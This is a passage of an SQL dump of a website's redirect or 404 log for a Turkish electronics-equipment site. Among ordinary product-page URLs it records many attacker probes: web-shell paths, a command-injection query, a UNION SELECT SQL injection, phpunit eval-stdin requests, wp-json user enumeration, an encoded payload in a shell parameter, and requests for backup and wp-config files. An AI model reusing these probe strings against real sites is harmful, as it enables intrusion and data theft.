00:00:00',301),(32250,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,product_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-24 23:35:54','0000-00-00 00:00:00',301),(32251,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-25 01:13:35','0000-00-00 00:00:00',301),(32252,'https://3s-technologies.com.tr/stats.php',NULL,'','',4,0,'2023-04-25 05:59:18','0000-00-00 00:00:00',301),(32253,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-25 10:14:43','0000-00-00 00:00:00',301),(32254,'http://www.3s-technologies.com.tr/en/security.txt',NULL,'http://www.3s-technologies.com.tr/security.txt','',22,0,'2023-04-25 11:21:06','0000-00-00 00:00:00',301),(32255,'http://www.3s-technologies.com.tr/en/.well-known/security.txt',NULL,'http://www.3s-technologies.com.tr/.well-known/security.txt','',22,0,'2023-04-25 11:21:06','0000-00-00 00:00:00',301),(32256,'http://www.3s-technologies.com.tr/en/humans.txt',NULL,'http://www.3s-technologies.com.tr/humans.txt','',22,0,'2023-04-25 11:21:07','0000-00-00 00:00:00',301),(32257,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-26 03:23:53','0000-00-00 00:00:00',301),(32258,'http://3s-technologies.com.tr/tr/dist/images/mask/guide/cn/step1.jpg',NULL,'','',5,0,'2023-04-26 05:40:44','0000-00-00 00:00:00',301),(32259,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-fä±rä±n',NULL,'','',3,0,'2023-04-27 01:45:29','0000-00-00 00:00:00',301),(32260,'http://www.3s-technologies.com.tr/en/wp-content/plugins/elementor-pro/changelog.txt',NULL,'www.google.com','',2,0,'2023-04-27 03:31:37','0000-00-00 00:00:00',301),(32261,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',3,0,'2023-04-27 06:10:53','0000-00-00 00:00:00',301),(32262,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/dalga-lehim',NULL,'','',3,0,'2023-04-27 09:20:45','0000-00-00 00:00:00',301),(32263,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-d3a-detail/askquestion?tmpl=component',NULL,'','',1,0,'2023-04-27 09:53:24','0000-00-00 00:00:00',301),(32264,'https://3s-technologies.com.tr/cache/index3.php',NULL,'','',2,0,'2023-04-27 11:36:57','0000-00-00 00:00:00',301),(32265,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-engine/index.php',NULL,'','',8,0,'2023-04-27 23:03:08','0000-00-00 00:00:00',301),(32266,'http://3s-technologies.com.tr/tr/wp-content/vz_yv.php',NULL,'','',3,0,'2023-04-27 23:03:09','0000-00-00 00:00:00',301),(32267,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/cnc',NULL,'','',3,0,'2023-04-28 03:11:21','0000-00-00 00:00:00',301),(32268,'http://3s-technologies.com.tr/tr/wp-content/vz_fz.php',NULL,'','',3,0,'2023-04-28 08:33:27','0000-00-00 00:00:00',301),(32269,'http://3s-technologies.com.tr/tr/wp-content/vz_og.php',NULL,'','',3,0,'2023-04-28 08:33:33','0000-00-00 00:00:00',301),(32270,'https://3s-technologies.com.tr/en/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2023-04-28 09:53:11','0000-00-00 00:00:00',301),(32271,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/screen-printer',NULL,'','',2,0,'2023-04-28 10:12:14','0000-00-00 00:00:00',301),(32272,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/aluminyum-iåÿleme-aluminum-processing',NULL,'','',4,0,'2023-04-28 15:27:58','0000-00-00 00:00:00',301),(32273,'https://3s-technologies.com.tr/modules/mod_ariimageslidersa/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',2,0,'2023-04-28 19:30:24','0000-00-00 00:00:00',301),(32274,'http://3s-technologies.com.tr//wp-admin/css/colors/blue/blue.php?wall=zwnobybhrhjpdjq7zxzhbcgkx1bpu1rbj3z6j10pow==',NULL,'www.google.com','',45,0,'2023-04-28 21:36:23','0000-00-00 00:00:00',301),(32275,'http://3s-technologies.com.tr/tr/wp-content/vz_jk.php',NULL,'','',3,0,'2023-04-28 22:20:08','0000-00-00 00:00:00',301),(32276,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-28 23:15:56','0000-00-00 00:00:00',301),(32277,'http://3s-technologies.com.tr/tr/wp-content/vz_hh.php',NULL,'','',3,0,'2023-04-29 06:20:37','0000-00-00 00:00:00',301),(32278,'http://3s-technologies.com.tr/tr/wp-content/vz_pg.php',NULL,'','',1,0,'2023-04-29 06:20:42','0000-00-00 00:00:00',301),(32279,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/rh2-detail?tmpl=component&print=1',NULL,'','',2,0,'2023-04-29 09:46:24','0000-00-00 00:00:00',301),(32280,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/lazer-markalama',NULL,'','',2,0,'2023-04-29 17:05:32','0000-00-00 00:00:00',301),(32281,'https://3s-technologies.com.tr/maill.php',NULL,'','',2,0,'2023-04-29 18:29:40','0000-00-00 00:00:00',301),(32282,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-detail',NULL,'','',1,0,'2023-04-29 23:05:11','0000-00-00 00:00:00',301),(32283,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,mf_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-29 23:07:52','0000-00-00 00:00:00',301),(32284,'https://3s-technologies.com.tr/en/media/com_acym/css/module.min.css',NULL,'https://3s-technologies.com.tr/media/com_acym/css/module.min.css','',2,0,'2023-04-30 05:11:51','0000-00-00 00:00:00',301),(32285,'https://3s-technologies.com.tr/includes.php',NULL,'','',2,0,'2023-05-01 05:07:53','0000-00-00 00:00:00',301),(32286,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/npm-vf-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-05-01 21:26:44','0000-00-00 00:00:00',301),(32287,'https://3s-technologies.com.tr/webconfig.txt.php',NULL,'','',2,0,'2023-05-02 01:38:18','0000-00-00 00:00:00',301),(32288,'http://3s-technologies.com.tr/en/class.api.php',NULL,'','',6,0,'2023-05-02 10:33:38','0000-00-00 00:00:00',301),(32289,'https://3s-technologies.com.tr/asfewfefs.php',NULL,'','',2,0,'2023-05-02 11:20:31','0000-00-00 00:00:00',301),(32290,'https://3s-technologies.com.tr/s_noeval.php',NULL,'','',2,0,'2023-05-02 11:34:31','0000-00-00 00:00:00',301),(32291,'http://3s-technologies.com.tr:80/tr/back.tar',NULL,'http://3s-technologies.com.tr:80/back.tar','',1,0,'2023-05-02 20:01:11','0000-00-00 00:00:00',301),(32292,'https://3s-technologies.com.tr/wp-class-inform.php',NULL,'','',2,0,'2023-05-02 21:34:39','0000-00-00 00:00:00',301),(32293,'https://3s-technologies.com.tr/myk.php',NULL,'','',2,0,'2023-05-02 22:50:53','0000-00-00 00:00:00',301),(32294,'https://3s-technologies.com.tr:443/tr/back.tar',NULL,'https://3s-technologies.com.tr:443/back.tar','',1,0,'2023-05-02 23:56:27','0000-00-00 00:00:00',301),(32295,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-03 01:42:46','0000-00-00 00:00:00',301),(32296,'https://3s-technologies.com.tr:443/tr/back.tar.gz',NULL,'https://3s-technologies.com.tr:443/back.tar.gz','',1,0,'2023-05-03 06:53:27','0000-00-00 00:00:00',301),(32297,'https://3s-technologies.com.tr/configbak.php',NULL,'','',2,0,'2023-05-03 09:03:05','0000-00-00 00:00:00',301),(32298,'https://3s-technologies.com.tr/cache/cachee.php',NULL,'','',2,0,'2023-05-03 09:05:49','0000-00-00 00:00:00',301),(32299,'https://3s-technologies.com.tr/images/robots.txt.php',NULL,'','',2,0,'2023-05-03 09:23:09','0000-00-00 00:00:00',301),(32300,'http://3s-technologies.com.tr:80/tr/backup.tar.gz',NULL,'http://3s-technologies.com.tr:80/backup.tar.gz','',1,0,'2023-05-03 09:49:58','0000-00-00 00:00:00',301),(32301,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/konveyorler',NULL,'','',2,0,'2023-05-03 11:57:54','0000-00-00 00:00:00',301),(32302,'https://3s-technologies.com.tr/wd.php',NULL,'','',2,0,'2023-05-03 16:25:37','0000-00-00 00:00:00',301),(32303,'https://3s-technologies.com.tr/uun.php',NULL,'','',2,0,'2023-05-03 16:49:47','0000-00-00 00:00:00',301),(32304,'https://3s-technologies.com.tr/en/media-admin.phpups.php',NULL,'','',2,0,'2023-05-03 16:49:47','0000-00-00 00:00:00',301),(32305,'https://3s-technologies.com.tr/s_e.php',NULL,'','',2,0,'2023-05-03 16:53:54','0000-00-00 00:00:00',301),(32306,'http://3s-technologies.com.tr:80/tr/backup.gz',NULL,'http://3s-technologies.com.tr:80/backup.gz','',1,0,'2023-05-03 17:05:06','0000-00-00 00:00:00',301),(32307,'https://3s-technologies.com.tr/en/wp-coments.php',NULL,'','',2,0,'2023-05-03 18:04:42','0000-00-00 00:00:00',301),(32308,'https://3s-technologies.com.tr/wp-tmp.php',NULL,'','',2,0,'2023-05-03 18:04:49','0000-00-00 00:00:00',301),(32309,'https://3s-technologies.com.tr/components/com_tags/views/tag/tmpl/framework.php',NULL,'','',2,0,'2023-05-03 18:48:19','0000-00-00 00:00:00',301),(32310,'https://3s-technologies.com.tr/en/media-admin.php.php',NULL,'','',2,0,'2023-05-03 19:01:39','0000-00-00 00:00:00',301),(32311,'https://3s-technologies.com.tr/.well-known/acme-challenge/menu_settings.php',NULL,'','',2,0,'2023-05-03 20:29:50','0000-00-00 00:00:00',301),(32312,'https://3s-technologies.com.tr/assets/images/utility.php',NULL,'','',2,0,'2023-05-03 22:08:43','0000-00-00 00:00:00',301),(32313,'https://3s-technologies.com.tr/wp-temp-ali.php',NULL,'','',2,0,'2023-05-03 22:26:43','0000-00-00 00:00:00',301),(32314,'https://3s-technologies.com.tr/en/wp-post.php',NULL,'','',2,0,'2023-05-03 22:47:39','0000-00-00 00:00:00',301),(32315,'https://3s-technologies.com.tr/en/cache/ups.php',NULL,'','',2,0,'2023-05-03 23:14:53','0000-00-00 00:00:00',301),(32316,'http://3s-technologies.com.tr:80/tr/dump.gz',NULL,'http://3s-technologies.com.tr:80/dump.gz','',1,0,'2023-05-04 00:20:48','0000-00-00 00:00:00',301),(32317,'https://3s-technologies.com.tr/en/sites/default/files/ups.phpups.php',NULL,'','',2,0,'2023-05-04 01:46:40','0000-00-00 00:00:00',301),(32318,'https://3s-technologies.com.tr/en/css/contents.php?673435',NULL,'','',2,0,'2023-05-04 04:04:52','0000-00-00 00:00:00',301),(32319,'https://3s-technologies.com.tr/en/wp-name.php',NULL,'','',2,0,'2023-05-04 04:12:10','0000-00-00 00:00:00',301),(32320,'https://3s-technologies.com.tr/en/simple.php',NULL,'','',20,0,'2023-05-04 04:21:04','0000-00-00 00:00:00',301),(32321,'https://3s-technologies.com.tr/en/get.php?f=f',NULL,'','',2,0,'2023-05-04 04:23:08','0000-00-00 00:00:00',301),(32322,'https://3s-technologies.com.tr/doc/doctrees/pdo.inc.php',NULL,'','',2,0,'2023-05-04 04:33:07','0000-00-00 00:00:00',301),(32323,'https://3s-technologies.com.tr/inc/install.php',NULL,'','',2,0,'2023-05-04 04:38:36','0000-00-00 00:00:00',301),(32324,'https://3s-technologies.com.tr:443/tr/dump.gz',NULL,'https://3s-technologies.com.tr:443/dump.gz','',1,0,'2023-05-04 04:43:08','0000-00-00 00:00:00',301),(32325,'https://3s-technologies.com.tr/lol.php',NULL,'','',2,0,'2023-05-04 05:47:10','0000-00-00 00:00:00',301),(32326,'https://3s-technologies.com.tr/assets/images/go.php',NULL,'','',2,0,'2023-05-04 06:04:32','0000-00-00 00:00:00',301),(32327,'https://3s-technologies.com.tr/assets/images/get.php',NULL,'','',2,0,'2023-05-04 06:49:33','0000-00-00 00:00:00',301),(32328,'https://3s-technologies.com.tr/en/cache/ups.phpups.php',NULL,'','',2,0,'2023-05-04 07:10:11','0000-00-00 00:00:00',301),(32329,'https://3s-technologies.com.tr/en/assets/colors/index3.php',NULL,'','',2,0,'2023-05-04 07:25:10','0000-00-00 00:00:00',301),(32330,'https://3s-technologies.com.tr/en/assets/images/ups.php',NULL,'','',2,0,'2023-05-04 07:37:40','0000-00-00 00:00:00',301),(32331,'http://3s-technologies.com.tr:80/tr/dump.tar.gz',NULL,'http://3s-technologies.com.tr:80/dump.tar.gz','',1,0,'2023-05-04 07:58:21','0000-00-00 00:00:00',301),(32332,'https://3s-technologies.com.tr/en/nin.php',NULL,'','',2,0,'2023-05-04 08:41:57','0000-00-00 00:00:00',301),(32333,'https://3s-technologies.com.tr/en/system_log.php?bala=up',NULL,'','',2,0,'2023-05-04 10:47:53','0000-00-00 00:00:00',301),(32334,'https://3s-technologies.com.tr/en/wp-admin/accesson.php',NULL,'','',3,0,'2023-05-04 11:18:51','0000-00-00 00:00:00',301),(32335,'https://3s-technologies.com.tr/demo/lol.php',NULL,'','',2,0,'2023-05-04 11:19:21','0000-00-00 00:00:00',301),(32336,'https://3s-technologies.com.tr:443/tr/dump.tar.gz',NULL,'https://3s-technologies.com.tr:443/dump.tar.gz','',1,0,'2023-05-04 12:36:46','0000-00-00 00:00:00',301),(32337,'http://3s-technologies.com.tr/en/main.js',NULL,'','',2,0,'2023-05-04 14:10:05','0000-00-00 00:00:00',301),(32338,'https://3s-technologies.com.tr/cache/accesson1.php',NULL,'','',6,0,'2023-05-04 15:51:12','0000-00-00 00:00:00',301),(32339,'http://3s-technologies.com.tr:80/tr/back.zip',NULL,'http://3s-technologies.com.tr:80/back.zip','',1,0,'2023-05-04 15:53:55','0000-00-00 00:00:00',301),(32340,'https://3s-technologies.com.tr/alfa_data/alfacgiapi/fox.php',NULL,'','',2,0,'2023-05-04 22:25:45','0000-00-00 00:00:00',301),(32341,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',3,0,'2023-05-04 22:28:05','0000-00-00 00:00:00',301),(32342,'http://3s-technologies.com.tr:80/tr/backup.zip',NULL,'http://3s-technologies.com.tr:80/backup.zip','',1,0,'2023-05-05 00:11:40','0000-00-00 00:00:00',301),(32343,'https://3s-technologies.com.tr/en/wp-content/uploads/nin.php',NULL,'','',2,0,'2023-05-05 01:25:15','0000-00-00 00:00:00',301),(32344,'http://3s-technologies.com.tr/tr/wp-includes/style.php?sig=rename',NULL,'','',1,0,'2023-05-05 19:14:51','0000-00-00 00:00:00',301),(32345,'http://3s-technologies.com.tr/tr/wp-content/style.php?sig=rename',NULL,'','',1,0,'2023-05-05 19:15:17','0000-00-00 00:00:00',301),(32346,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-07 00:58:15','0000-00-00 00:00:00',301),(32347,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-ultra-hä±z',NULL,'','',1,0,'2023-05-07 17:15:02','0000-00-00 00:00:00',301),(32348,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,ordering?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-08 02:07:08','0000-00-00 00:00:00',301),(32349,'http://3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/manufacturer/ddm-novastar',NULL,'http://www.google.com','',1,0,'2023-05-08 09:00:37','0000-00-00 00:00:00',301),(32350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',2,0,'2023-05-08 15:12:06','0000-00-00 00:00:00',301),(32351,'https://3s-technologies.com.tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',8,0,'2023-05-08 18:24:32','0000-00-00 00:00:00',301),(32352,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/le-40v-detail?tmpl=component&print=1',NULL,'','',2,0,'2023-05-09 06:52:45','0000-00-00 00:00:00',301),(32353,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/cs40-detail',NULL,'','',2,0,'2023-05-10 09:10:35','0000-00-00 00:00:00',301),(32354,'http://3s-technologies.com.tr/tr/wp-content/vz_ig.php',NULL,'','',3,0,'2023-05-10 13:53:48','0000-00-00 00:00:00',301),(32355,'http://3s-technologies.com.tr:80/tr/wp-config.php.bak',NULL,'http://3s-technologies.com.tr:80/wp-config.php.bak','',1,0,'2023-05-10 16:08:39','0000-00-00 00:00:00',301),(32356,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-10 16:59:38','0000-00-00 00:00:00',301),(32357,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',3,0,'2023-05-10 20:01:42','0000-00-00 00:00:00',301),(32358,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/dalga-lehim/by,product_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-05-11 05:38:28','0000-00-00 00:00:00',301),(32359,'http://3s-technologies.com.tr/en/archivarix.cms.php',NULL,'','',3,0,'2023-05-11 08:40:41','0000-00-00 00:00:00',301),(32360,'https://3s-technologies.com.tr/en/wp-json/wp/v2/users',NULL,'','',1,0,'2023-05-12 19:54:22','0000-00-00 00:00:00',301),(32361,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-05-12 20:40:59','0000-00-00 00:00:00',301),(32362,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,ordering?language=tr-tr&keyword=',NULL,'','',2,0,'2023-05-12 20:54:11','0000-00-00 00:00:00',301),(32363,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',4,0,'2023-05-13 09:36:39','0000-00-00 00:00:00',301),(32364,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-daft/miin.php',NULL,'','',3,0,'2023-05-14 00:16:18','0000-00-00 00:00:00',301),(32365,'http://3s-technologies.com.tr/tr/phpqrcode/shell.php?shell=echo+123|+md5sum',NULL,'','',1,0,'2023-05-14 18:29:46','0000-00-00 00:00:00',301),(32366,'http://www.3s-technologies.com.tr/tr/phpqrcode/shell.php?shell=echo+123|+md5sum',NULL,'','',1,0,'2023-05-14 18:29:47','0000-00-00 00:00:00',301),(32367,'http://3s-technologies.com.tr/tr/sgadmin/fncpursewithdraw/detail.php?wdw=1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,(select+md5(md5(\'safwerqwejlkjflasldfasndk\')))',NULL,'','',1,0,'2023-05-14 18:29:47','0000-00-00 00:00:00',301),(32368,'http://3s-technologies.com.tr/tr/upload/eupload',NULL,'','',1,0,'2023-05-14 18:29:48','0000-00-00 00:00:00',301),(32369,'http://www.3s-technologies.com.tr/tr/sgadmin/fncpursewithdraw/detail.php?wdw=1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,(select+md5(md5(\'safwerqwejlkjflasldfasndk\')))',NULL,'','',1,0,'2023-05-14 18:29:48','0000-00-00 00:00:00',301),(32370,'http://www.3s-technologies.com.tr/tr/upload/eupload',NULL,'','',1,0,'2023-05-14 18:29:48','0000-00-00 00:00:00',301),(32371,'http://3s-technologies.com.tr/tr/ch/upload/upload',NULL,'','',1,0,'2023-05-14 18:29:48','0000-00-00 00:00:00',301),(32372,'http://www.3s-technologies.com.tr/tr/ch/upload/upload',NULL,'','',1,0,'2023-05-14 18:29:49','0000-00-00 00:00:00',301),(32373,'http://3s-technologies.com.tr/tr/admin/login/login.html',NULL,'','',1,0,'2023-05-14 18:29:50','0000-00-00 00:00:00',301),(32374,'http://www.3s-technologies.com.tr/tr/admin/login/login.html',NULL,'','',1,0,'2023-05-14 18:29:50','0000-00-00 00:00:00',301),(32375,'http://3s-technologies.com.tr/tr/static/js/admin.js',NULL,'','',1,0,'2023-05-14 18:29:50','0000-00-00 00:00:00',301),(32376,'http://www.3s-technologies.com.tr/tr/static/js/admin.js',NULL,'','',1,0,'2023-05-14 18:29:51','0000-00-00 00:00:00',301),(32377,'http://3s-technologies.com.tr/tr/loginme',NULL,'','',1,0,'2023-05-14 18:29:51','0000-00-00 00:00:00',301),(32378,'http://www.3s-technologies.com.tr/tr/loginme',NULL,'','',1,0,'2023-05-14 18:29:51','0000-00-00 00:00:00',301),(32379,'http://3s-technologies.com.tr/tr/admin/auth/index.html',NULL,'','',1,0,'2023-05-14 18:29:52','0000-00-00 00:00:00',301),(32380,'http://www.3s-technologies.com.tr/tr/admin/auth/index.html',NULL,'','',1,0,'2023-05-14 18:29:52','0000-00-00 00:00:00',301),(32381,'http://www.3s-technologies.com.tr/tr/static/admin.js',NULL,'','',1,0,'2023-05-14 18:29:53','0000-00-00 00:00:00',301),(32382,'http://www.3s-technologies.com.tr/tr/static/component/pear/pear.js',NULL,'','',1,0,'2023-05-14 18:29:53','0000-00-00 00:00:00',301),(32383,'http://www.3s-technologies.com.tr/tr/auth/login',NULL,'','',1,0,'2023-05-14 18:29:54','0000-00-00 00:00:00',301),(32384,'http://www.3s-technologies.com.tr/tr/admin/auth/login',NULL,'','',1,0,'2023-05-14 18:29:54','0000-00-00 00:00:00',301),(32385,'http://3s-technologies.com.tr/tr/static/admin.js',NULL,'','',1,0,'2023-05-14 18:29:54','0000-00-00 00:00:00',301),(32386,'http://3s-technologies.com.tr/tr/static/component/pear/pear.js',NULL,'','',1,0,'2023-05-14 18:29:55','0000-00-00 00:00:00',301),(32387,'http://3s-technologies.com.tr/tr/admin/auth/login',NULL,'','',1,0,'2023-05-14 18:29:56','0000-00-00 00:00:00',301),(32388,'https://3s-technologies.com.tr/en/blog/wp-json/wp/v2/users',NULL,'','',1,0,'2023-05-14 19:06:36','0000-00-00 00:00:00',301),(32389,'http://3s-technologies.com.tr/en/+++++++++++++++++++++++++++s/',NULL,'http://3s-technologies.com.tr/en/+++++++++++++++++++++++++++s/','',1,0,'2023-05-15 00:47:34','0000-00-00 00:00:00',301),(32390,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/index.php',NULL,'','',9,0,'2023-05-15 00:49:38','0000-00-00 00:00:00',301),(32391,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/npm-w2s-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-05-15 06:37:42','0000-00-00 00:00:00',301),(32392,'https://www.3s-technologies.com.tr/en/wp-content/updates.php',NULL,'www.google.com','',2,0,'2023-05-15 07:17:54','0000-00-00 00:00:00',301),(32393,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler',NULL,'','',2,0,'2023-05-15 15:35:37','0000-00-00 00:00:00',301),(32394,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/dalga-lehim/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-15 17:33:25','0000-00-00 00:00:00',301),(32395,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2023-05-16 01:36:43','0000-00-00 00:00:00',301),(32396,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/by,`p`.product_sku?language=tr-tr&keyword=',NULL,'','',2,0,'2023-05-16 17:04:31','0000-00-00 00:00:00',301),(32397,'http://3s-technologies.com.tr/en/wp-content/themes/hello-element/footer.php',NULL,'','',3,0,'2023-05-16 21:39:56','0000-00-00 00:00:00',301),(32398,'http://3s-technologies.com.tr/tr/wp-content/plugins/essential-addons-for-elementor-lite/assets/admin/css/cloud.css',NULL,'','',2,0,'2023-05-17 16:25:47','0000-00-00 00:00:00',301),(32399,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_mna.php',NULL,'','',3,0,'2023-05-18 13:33:54','0000-00-00 00:00:00',301),(32400,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/hakkä±mä±zda',NULL,'','',2,0,'2023-05-18 20:18:13','0000-00-00 00:00:00',301),(32401,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/bã¶lgesel-lehimleme',NULL,'','',1,0,'2023-05-19 17:55:41','0000-00-00 00:00:00',301),(32402,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-05-20 19:27:41','0000-00-00 00:00:00',301),(32403,'https://www.3s-technologies.com.tr/en/79-english-uk/101-panasonic-overview-2',NULL,'','',20,0,'2023-05-21 01:08:52','0000-00-00 00:00:00',301),(32404,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/readme.txt',NULL,'','',21,0,'2023-05-21 17:47:14','0000-00-00 00:00:00',301),(32405,'http://3s-technologies.com.tr/en/rindex.php?action=add',NULL,'','',2,0,'2023-05-21 20:45:58','0000-00-00 00:00:00',301),(32406,'http://3s-technologies.com.tr/tr/19837437_notfound.html',NULL,'http://3s-technologies.com.tr/19837437_notfound.html','',1,0,'2023-05-22 03:24:44','0000-00-00 00:00:00',301),(32407,'http://www.3s-technologies.com.tr/tr/title=',NULL,'','',1,0,'2023-05-22 20:22:21','0000-00-00 00:00:00',301),(32408,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-23 03:27:02','0000-00-00 00:00:00',301),(32409,'https://3s-technologies.com.tr/en/odhahvo7d0o/xacggw6yrrr/6ehlmdhjsysnrov/qbgajguvf0ivrmjrldlx',NULL,'','',1,0,'2023-05-24 10:05:41','0000-00-00 00:00:00',301),(32410,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=ciagjgzjid0gj1lvunlhwfkwtfzcewfywtrjrljqvdb3ofazqm9jq0jswtjodkldyzhjsepsugljdwnhahdym1z1wvcxbetda3vjbhh1swk0blbhsnlmejq4wm05ewjtqnrawfjvyjjrouluqnzjm1fpsudwdvkzujvjr1u5sw0xmwjiunbjr0z5zem5bwizsnrmv1jozedfavbqehbibkixzencmgvyqmxqu0ptyvd4belpqnvzvzfsufnkzlh5sstqr2x1y0hwmelhnwhiv1u5sww4auliujvjr1u5sw5omvltmxbkq0lnzg1gc2rxvtljbfz3ykc5afpdsstqqzltyjnkdfbpyzdhv1lvsky5uvqxtlvlwhrwwmloqvkyoxdlu2drwdbaslrfvlrxewrmwhlkzfd5zdbiwejmym1gdfptzgrmq0frwdbaslrfvlrxewrmwhlkzfd5zhvzvzfssjewcetydgxzmmh2sunkufn5yzdmv1zzyzjwn1pxtm9ieufuulzjbk8zmtlqejq9jzskicakzm4gpsanvnpsyvrlyw0ucghwjzskicbpziggznvuy3rpb25fzxhpc3rzkcdmawxlx3b1df9jb250zw50cycpickgewogicagzmlszv9wdxrfy29udgvudhmojgzulcbiyxnlnjrfzgvjb2rlkcrmyykpowogih1lbhnlewogicagqhrvdwnokcrmbik7ciagicbpzighjgzvid0gzm9wzw4ojgzulcanyscpksb7ciagicagigvjag8gj2vycm9yjzskicagicagzxhpddskicagih07ciagicbmd3jpdguojgzvlcbiyxnlnjrfzgvjb2rlkcrmyykpowogicagzmnsb3nlkcrmbyk7ciagfqogiglmkcbmawxlx2v4axn0cygkzm4pickgewogicagzwnobyanyuryaxy0jzskicagigv4axq7ciagfq==',NULL,'www.google.com','',1,0,'2023-05-24 13:42:55','0000-00-00 00:00:00',301),(32411,'http://3s-technologies.com.tr/tr/wp-content/vz_nt.php',NULL,'','',3,0,'2023-05-24 14:34:51','0000-00-00 00:00:00',301),(32412,'http://3s-technologies.com.tr/en/wp-content/themes/work-pro/sett.php',NULL,'www.google.com','',1,0,'2023-05-24 14:50:14','0000-00-00 00:00:00',301),(32413,'http://3s-technologies.com.tr/en/wp-content/themes/build-pro/tess.php',NULL,'www.google.com','',1,0,'2023-05-24 14:50:15','0000-00-00 00:00:00',301),(32414,'http://3s-technologies.com.tr/en/wp-content/themes/blafos/sett.php',NULL,'www.google.com','',1,0,'2023-05-24 14:50:16','0000-00-00 00:00:00',301),(32415,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-24 15:50:10','0000-00-00 00:00:00',301),(32416,'http://3s-technologies.com.tr/en/wp-content/style.php?sig=update&domain=51.79.124.111',NULL,'www.google.com','',1,0,'2023-05-24 18:15:21','0000-00-00 